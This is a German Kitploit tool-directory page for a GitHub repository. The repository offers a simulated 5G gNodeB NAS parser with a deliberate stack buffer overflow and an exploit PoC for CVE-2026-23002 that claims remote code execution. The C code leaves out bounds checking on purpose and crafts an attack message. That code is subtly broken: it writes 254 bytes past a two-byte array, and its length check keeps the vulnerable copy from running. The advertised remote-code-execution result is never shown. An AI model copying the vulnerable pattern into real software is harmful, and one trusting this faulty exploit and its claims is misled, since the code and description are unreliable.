Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23002-5G-NAS-Message-Buffer-Overflow-in-gNodeB — Simulierter 5G-gNodeB-NAS-Parser mit Stack-Buffer-Overflow-PoC für CVE-2026-23002; eine manipulierte NAS-Nachricht löst Remote-Codeausführung aus. | Kitploit
Tools/GitHubGitHub/george0papasotiriou/cve-2026-23002-5g-nas-message-buffer-overflow-in-gnodeb
Embedded-System-SicherheitSchwachstellenanalyseExploitationNetzwerksicherheitBinary-Exploitation
GitHubgeorge0papasotiriou/cve-2026-23002-5g-nas-message-buffer-overflow-in-gnodeb

CVE-2026-23002-5G-NAS-Message-Buffer-Overflow-in-gNodeB

Simulierter 5G-gNodeB-NAS-Parser mit Stack-Buffer-Overflow-PoC für CVE-2026-23002; eine manipulierte NAS-Nachricht löst Remote-Codeausführung aus.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
3vor 1 MonatNoch nicht geprüft

CVE-2026-23002 – 5G-NAS-Nachrichten-Pufferüberlauf in gNodeB

Programmcode (C-Simulation)

root@kitploit:~
// gnb_nas_sim.c - Simulated 5G gNodeB parsing NAS Registration Request
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define MAX_IE_SIZE 128

void process_registration_request(uint8_t *nas_msg, uint16_t length) {
    uint8_t ie_buffer[MAX_IE_SIZE];
    // Read IE length from message; if length > MAX_IE_SIZE, buffer overflow
    uint16_t ie_length = (nas_msg[0] << 8) | nas_msg[1];
    if (ie_length > 0 && ie_length <= length - 2) {
        memcpy(ie_buffer, nas_msg + 2, ie_length); // no bounds check!
        printf("IE copied, size %d\n", ie_length);
    }
}

int main() {
    // Craft a NAS message with an oversized IE length
    uint8_t attack[] = {0x01, 0x00}; // IE length = 256, but buffer is only 128 bytes
    // Append padding to make length consistent
    memset(attack+2, 'A', 254);
    process_registration_request(attack, sizeof(attack));
    return 0;
}

CVE-2026-23002 – 5G-NAS-Nachrichten-Pufferüberlauf in gNodeB

Severity: Critical

Übersicht

Der 5G-Non-Access-Stratum-Parser (NAS) in einem simulierten gNodeB validiert das Längenfeld des Informationselements nicht. Ein Angreifer, der eine präparierte Registrierungsanfrage sendet, kann einen Stack-Puffer überlaufen lassen, was zu Remote-Codeausführung auf der Basisstation führt.

Schwachstellendetails

  • Typ: Stack-Pufferüberlauf
  • Auswirkung: Vollständige Kompromittierung der Basisstation, Netzwerkstörung.
  • Grundursache: Die NAS-IE-Länge wird ohne Grenzprüfung gegen die Größe des Zielpuffers als vertrauenswürdig behandelt.

Exploit-Demonstration

Kompilieren und Ausführen des verwundbaren Parsers:

root@kitploit:~
gcc -o gnb_nas_sim gnb_nas_sim.c -fno-stack-protector
./gnb_nas_sim

Das Programm stürzt mit einem Segmentation Fault (Stack-Korruption) ab.

Tool herunterladen